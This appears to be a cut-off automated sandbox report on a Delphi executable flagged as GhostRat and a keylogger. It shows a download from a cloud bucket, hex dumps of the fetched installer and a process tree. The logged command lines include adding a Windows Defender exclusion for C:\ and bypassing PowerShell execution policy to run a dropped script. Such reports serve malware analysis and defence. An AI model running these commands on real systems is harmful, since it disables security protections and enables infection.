                                                                                                                          Jan 4, 2025 05:38:21.259260893 CET1.1.1.1192.168.2.40x283bNo error (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com47.79.48.211A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com

                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44973547.79.48.2114437344C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-04 04:38:22 UTC155OUTGET /pc_yyb_2700200680_installer.exe HTTP/1.1
                                                                                                                          User-Agent: URLDownloader
                                                                                                                          Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2025-01-04 04:38:23 UTC561INHTTP/1.1 200 OK
                                                                                                                          Server: AliyunOSS
                                                                                                                          Date: Sat, 04 Jan 2025 04:38:23 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 7460336
                                                                                                                          Connection: close
                                                                                                                          x-oss-request-id: 6778BB3F5F471E3932D0E35D
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          ETag: "9DEE6F9C41488F78CC867C028EA58199"
                                                                                                                          Last-Modified: Tue, 31 Dec 2024 04:19:08 GMT
                                                                                                                          x-oss-object-type: Normal
                                                                                                                          x-oss-hash-crc64ecma: 282137398408292773
                                                                                                                          x-oss-storage-class: Standard
                                                                                                                          x-oss-ec: 0048-00000113
                                                                                                                          Content-Disposition: attachment
                                                                                                                          x-oss-force-download: true
                                                                                                                          Content-MD5: ne5vnEFIj3jMhnwCjqWBmQ==
                                                                                                                          x-oss-server-time: 11
                                                                                                                          2025-01-04 04:38:23 UTC15823INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 9e 79 64 4c ff 17 37 4c ff 17 37 4c ff 17 37 58 94 14 36 58 ff 17 37 58 94 12 36 a8 ff 17 37 1e 8a 13 36 5f ff 17 37 1e 8a 14 36 46 ff 17 37 1e 8a 12 36 38 ff 17 37 2a 90 ea 37 46 ff 17 37 58 94 10 36 4f ff 17 37 58 94 13 36 65 ff 17 37 58 94 11 36 4e ff 17 37 4c ff 17 37 5d ff 17 37 db a1 13 36 09 fe 17 37 86 8a 13 36 45 ff 17 37 f5 8a 12 36 6e ff 17 37 f5 8a 13 36 4d ff 17
                                                                                                                          Data Ascii: MZ@h!L!This program cannot be run in DOS mode.$ydL7L7L7X6X7X676_76F7687*7F7X6O7X6e7X6N7L7]7676E76n76M
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: f0 66 0f db 42 c0 66 0f db 4a d0 66 0f eb e0 66 0f db 52 e0 66 0f eb e9 66 0f db 5a f0 66 0f eb e2 66 0f eb eb 66 41 0f 6f 04 24 66 41 0f 6f 4c 24 10 66 41 0f 6f 54 24 20 66 41 0f 6f 5c 24 30 66 0f db 02 66 0f db 4a 10 66 0f eb e0 66 0f db 52 20 66 0f eb e9 66 0f db 5a 30 66 0f eb e2 66 0f eb eb 66 41 0f 6f 44 24 40 66 41 0f 6f 4c 24 50 66 41 0f 6f 54 24 60 66 41 0f 6f 5c 24 70 66 0f db 42 40 66 0f db 4a 50 66 0f eb e0 66 0f db 52 60 66 0f eb e9 66 0f db 5a 70 66 0f eb e2 66 0f eb eb 66 0f eb e5 66 0f 70 c4 4e 66 0f eb c4 4d 8d a4 24 00 01 00 00 48 8b 06 66 48 0f 7e c3 4d 31 ff 4c 89 c5 4c 8b 14 24 48 f7 e3 49 01 c2 48 8b 01 48 83 d2 00 49 0f af ea 49 89 d3 48 f7 e5 49 01 c2 48 8b 46 08 48 83 d2 00 4c 8b 54 24 08 49 89 d5 4d 8d 7f 01 eb 25 90 90 90 90 90
                                                                                                                          Data Ascii: fBfJffRffZfffAo$fAoL$fAoT$ fAo\$0ffJffR ffZ0fffAoD$@fAoL$PfAoT$`fAo\$pfB@fJPffR`ffZpffffpNfM$HfH~M1LL$HIHHIIHIHFHLT$IM%
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 62 e3 f6 56 10 66 4c 0f 38 f6 c0 c4 62 fb f6 5e 18 66 4c 0f 38 f6 cb c4 62 e3 f6 66 20 66 4c 0f 38 f6 d0 c4 62 fb f6 6e 28 66 4c 0f 38 f6 db c4 62 e3 f6 76 30 66 4c 0f 38 f6 e0 c4 62 fb f6 7e 38 66 4c 0f 38 f6 eb 66 4c 0f 38 f6 f0 67 4c 89 c3 66 4c 0f 38 f6 ff 48 c7 c1 f9 ff ff ff eb 11 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 44 0f 6f 45 00 66 44 0f 6f 4d 10 66 44 0f 6f 55 20 66 44 0f 6f 5d 30 66 44 0f db c0 66 44 0f 6f 65 40 66 44 0f db c9 66 44 0f 6f 6d 50 66 44 0f db d2 66 44 0f 6f 75 60 66 44 0f db db 66 44 0f 6f 7d 70 48 8d ad 80 00 00 00 66 44 0f db e4 66 44 0f db ed 66 44 0f db f6 66 44 0f db ff 66 45 0f eb c2 66 45 0f eb cb 66 45 0f eb c4 66 45 0f eb cd 66 45 0f eb c6 66 45 0f eb cf 66 45 0f eb c1 66 45 0f 70 c8 4e 66 45 0f eb c1 66
                                                                                                                          Data Ascii: bVfL8b^fL8bf fL8bn(fL8bv0fL8b~8fL8fL8gLfL8HfDoEfDoMfDoU fDo]0fDfDoe@fDfDomPfDfDou`fDfDo}pHfDfDfDfDfEfEfEfEfEfEfEfEpNfEf
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 00 00 00 48 8d bc 24 40 01 00 00 e8 e1 f6 ff ff 4c 89 27 4c 89 6f 08 4c 89 47 10 4c 89 4f 18 48 8b 94 24 80 00 00 00 48 8d 9c 24 80 00 00 00 4c 8b 8c 24 e0 00 00 00 4c 8b 94 24 e8 00 00 00 48 8d 74 24 60 4c 8b 9c 24 f0 00 00 00 4c 8b a4 24 f8 00 00 00 48 8d bc 24 00 01 00 00 e8 30 d9 ff ff 48 8b 94 24 40 01 00 00 48 8d 9c 24 40 01 00 00 4c 8b 4c 24 40 4c 8b 54 24 48 48 8d 74 24 c0 4c 8b 5c 24 50 4c 8b 64 24 58 48 8d bc 24 40 01 00 00 e8 fa d8 ff ff 48 8d 9c 24 00 01 00 00 48 8d bc 24 40 01 00 00 e8 e5 f5 ff ff 66 48 0f 7e c7 66 0f 6f c5 66 0f 6f cd 66 0f df 84 24 60 01 00 00 66 0f 6f d5 66 0f df 8c 24 70 01 00 00 66 0f 6f dd 66 0f db 94 24 20 02 00 00 66 0f db 9c 24 30 02 00 00 66 0f eb d0 66 0f eb d9 66 0f 6f c4 66 0f 6f cc 66 0f df c2 66 0f 6f d4 66 0f
                                                                                                                          Data Ascii: H$@L'LoLGLOH$H$L$L$Ht$`L$L$H$0H$@H$@LL$@LT$HHt$L\$PLd$XH$@H$H$@fH~fofof$`fof$pfof$ f$0fffofoffof
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 5b 20 c4 63 7b f0 e5 1b c4 e3 7b f0 dd 02 31 cd c4 c1 45 ef f8 44 01 e0 31 d5 41 03 75 a0 c5 bd 72 d7 1e c5 c5 72 f7 02 8d 34 2e c4 63 7b f0 e0 1b c4 e3 7b f0 e8 02 31 d8 44 01 e6 31 c8 c4 c1 45 eb f8 41 03 55 a4 8d 14 02 c4 63 7b f0 e6 1b c4 e3 7b f0 c6 02 c4 41 45 fe cb 31 ee 44 01 e2 31 de 41 03 4d a8 c5 7e 7f 8c 24 e0 01 00 00 8d 0c 31 c4 63 7b f0 e2 1b c4 e3 7b f0 f2 02 31 c2 44 01 e1 31 ea 41 03 5d ac 89 f7 31 c7 8d 1c 13 c4 63 7b f0 e1 1b c4 e3 7b f0 d1 02 31 f1 44 01 e3 21 f9 eb 0c 90 90 90 90 90 90 90 90 90 90 90 90 c4 63 45 0f c6 08 c5 fd ef c4 41 03 6d c0 31 f1 c5 fd ef c1 89 d7 31 f7 8d 2c 29 c4 c1 7d ef c0 c4 63 7b f0 e3 1b c4 e3 7b f0 cb 02 31 d3 c5 bd 72 d0 1e c5 fd 72 f0 02 44 01 e5 21 fb 41 03 45 c4 31 d3 89 cf 31 d7 c4 c1 7d eb c0 8d 04
                                                                                                                          Data Ascii: [ c{{1ED1Aurr4.c{{1D1EAUc{{AE1D1AM~$1c{{1D1A]1c{{1D!cEAm11,)}c{{1rrD!AE11}
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: fe 75 00 41 31 dd 44 03 44 24 0c 44 89 cf 41 31 d4 45 0f ac f6 0b 44 31 d7 45 01 e0 45 0f ac ed 06 41 21 ff 45 31 ce 45 01 e8 45 31 d7 45 0f ac f6 02 44 01 c0 45 01 f8 41 89 c5 45 01 c6 c5 f9 7f 34 24 c4 e3 69 0f e1 04 45 0f ac ed 0e 45 89 f0 41 89 dc c4 e3 79 0f fb 04 45 0f ac f6 09 41 31 c5 41 31 cc c5 c9 72 d4 07 45 0f ac ed 05 45 31 c6 41 21 c4 c5 f1 fe cf 41 31 c5 03 54 24 10 45 89 c7 c5 c1 72 d4 03 41 31 cc 45 0f ac f6 0b 45 31 cf c5 d1 72 f4 0e 44 01 e2 45 0f ac ed 06 44 21 ff c5 c1 ef e6 45 31 c6 44 01 ea 44 31 cf c5 f9 70 f8 fa 45 0f ac f6 02 41 01 d3 01 fa c5 c9 72 d6 0b 45 89 dd 41 01 d6 45 0f ac ed 0e c5 d9 ef e5 44 89 f2 41 89 c4 45 0f ac f6 09 c5 d1 72 f5 0b 45 31 dd 41 31 dc 45 0f ac ed 05 c5 d9 ef e6 41 31 d6 45 21 dc 45 31 dd c5 c9 72 d7
                                                                                                                          Data Ascii: uA1DD$DA1ED1EEA!E1EE1EDEAE4$iEEAyEA1A1rEE1A!A1T$ErA1EE1rDED!E1DD1pEArEAEDAErE1A1EA1E!E1r
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 01 eb c4 41 39 ef c2 48 31 d7 49 c1 ce 1c c5 a9 73 d2 06 49 01 d9 48 01 fb c4 c1 61 d4 d8 4d 89 cd 49 01 de 8f 48 78 c3 cb 2a 49 c1 cd 17 4c 89 f3 c4 41 21 ef da 4d 89 d4 49 c1 ce 05 4d 31 cd 4d 31 dc c4 41 21 ef d9 49 c1 cd 04 49 31 de 4d 21 cc 4d 31 cd c4 c1 61 d4 db 48 03 44 24 38 48 89 df 4d 31 dc 49 c1 ce 06 c5 61 d4 55 e0 48 31 cf 4c 01 e0 49 c1 cd 0e 49 21 ff 49 31 de 4c 01 e8 49 31 cf 49 c1 ce 1c 49 01 c0 4c 01 f8 4d 89 c5 49 01 c6 c5 79 7f 54 24 30 c4 63 51 0f c4 08 49 c1 cd 17 4c 89 f0 c4 63 71 0f d8 08 4d 89 cc 49 c1 ce 05 8f 48 78 c3 c8 38 4d 31 c5 4d 31 d4 c4 c1 39 73 d0 07 49 c1 cd 04 49 31 c6 c4 c1 59 d4 e3 4d 21 c4 4d 31 c5 4c 03 5c 24 40 49 89 c7 8f 48 78 c3 d1 07 4d 31 d4 49 c1 ce 06 c4 41 39 ef c1 49 31 df 4d 01 e3 49 c1 cd 0e 4c 21 ff
                                                                                                                          Data Ascii: A9H1IsIHaMIHx*ILA!MIM1M1A!II1M!M1aHD$8HM1IaUH1LII!I1LI1IILMIyT$0cQILcqMIHx8M1M19sII1YM!M1L\$@IHxM1IA9I1MIL!
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 06 4c 8b 4e 10 4c 8b 56 28 4c 8d 5e 38 4c 8d 66 18 4c 89 54 24 20 4c 89 5c 24 28 4c 89 64 24 30 48 89 4c 24 38 ff 15 ee 7d 3a 00 b8 01 00 00 00 48 83 c4 40 9d 41 5f 41 5e 41 5d 41 5c 5d 5b 5f 5e f3 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 81 ec 88 00 00 00 49 c7 c1 ff ff ff ff 48 8d 34 00 49 c1 e9 03 48 8d 3c 85 00 00 00 00 49 21 c1 4c 8d 24 c5 00 00 00 00 48 c1 f8 3f 4f 8d 14 09 48 c1 fe 3f 4e 8d 1c 8d 00 00 00 00 48 21 e8 48 c1 ff 3f 48 89 c2 48 c1 e0 3f 48 21 ee 48 d1 ea 48 89 f1 48 c1 e6 3e 48 21 ef 48 c1 e9 02 48 31 f0 48 89 fb 48 c1 e7 3d 48 31 ca 48 c1 eb 03 48 31 f8 48 31 da 4d 89 cd 48 c7 04 24 00 00 00 00 4d 31 d5 4c 89 4c 24 08 4d 89 de 4c 89
                                                                                                                          Data Ascii: LNLV(L^8LfLT$ L\$(Ld$0HL$8}:H@A_A^A]A\][_^HIH4IH<I!L$H?OH?NH!H?HH?H!HHH>H!HH1HH=H1HH1H1MH$M1LL$ML
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 44 0f 29 b4 24 90 00 00 00 44 0f 29 bc 24 a0 00 00 00 f3 0f 6f 07 e8 76 02 00 00 e8 51 f7 ff ff f3 0f 7f 06 0f 28 74 24 10 0f 28 7c 24 20 44 0f 28 44 24 30 44 0f 28 4c 24 40 44 0f 28 54 24 50 44 0f 28 5c 24 60 44 0f 28 64 24 70 44 0f 28 ac 24 80 00 00 00 44 0f 28 b4 24 90 00 00 00 44 0f 28 bc 24 a0 00 00 00 48 8d a4 24 b8 00 00 00 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 90 90 90 90 90 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 48 8d a4 24 48 ff ff ff 0f 29 74 24 10 0f 29 7c 24 20 44 0f 29 44 24 30 44 0f 29 4c 24 40 44 0f 29 54 24 50 44 0f 29 5c 24 60 44 0f 29 64 24 70 44 0f 29 ac 24 80 00 00 00 44 0f 29 b4 24 90 00 00 00 44 0f 29 bc 24 a0 00 00 00 f3 0f 6f 07 e8 a6 01 00 00 e8 e1 f7 ff ff f3 0f 7f 06 0f 28 74 24 10 0f 28 7c 24 20 44
                                                                                                                          Data Ascii: D)$D)$ovQ(t$(|$ D(D$0D(L$@D(T$PD(\$`D(d$pD($D($D($H$H|$Ht$H|$Ht$HHHLH$H)t$)|$ D)D$0D)L$@D)T$PD)\$`D)d$pD)$D)$D)$o(t$(|$ D
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: cf 48 89 d6 4c 89 c2 4c 89 c9 4c 8b 44 24 28 48 8d 64 24 a8 0f 29 34 24 0f 29 7c 24 10 44 0f 29 44 24 20 44 0f 29 4c 24 30 48 83 e2 f0 0f 84 42 05 00 00 8b 81 f0 00 00 00 0f 10 01 49 89 cb 41 89 c2 45 85 c0 0f 84 46 02 00 00 48 81 fa 80 00 00 00 0f 82 e0 00 00 00 f3 0f 6f 17 f3 0f 6f 5f 10 f3 0f 6f 67 20 f3 0f 6f 6f 30 f3 0f 6f 77 40 f3 0f 6f 7f 50 f3 44 0f 6f 47 60 f3 44 0f 6f 4f 70 48 8d bf 80 00 00 00 48 81 ea 80 00 00 00 eb 5e 0f 11 16 4c 89 d9 f3 0f 6f 17 44 89 d0 0f 11 5e 10 f3 0f 6f 5f 10 0f 11 66 20 f3 0f 6f 67 20 0f 11 6e 30 f3 0f 6f 6f 30 0f 11 76 40 f3 0f 6f 77 40 0f 11 7e 50 f3 0f 6f 7f 50 44 0f 11 46 60 f3 44 0f 6f 47 60 44 0f 11 4e 70 48 8d b6 80 00 00 00 f3 44 0f 6f 4f 70 48 8d bf 80 00 00 00 e8 dd fc ff ff 48 81 ea 80 00 00 00 73 94 0f 11
                                                                                                                          Data Ascii: HLLLD$(Hd$)4$)|$D)D$ D)L$0HBIAEFHoo_og oo0ow@oPDoG`DoOpHH^LoD^o_f og n0oo0v@ow@~PoPDF`DoG`DNpHDoOpHHs


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:23:38:13
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\HGwpjJUqhW.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5 hash:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2089018871.0000000000403000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1671468672.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:23:38:17
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                          File size:496'640 bytes
                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:23:38:19
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5 hash:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 8%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x320000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
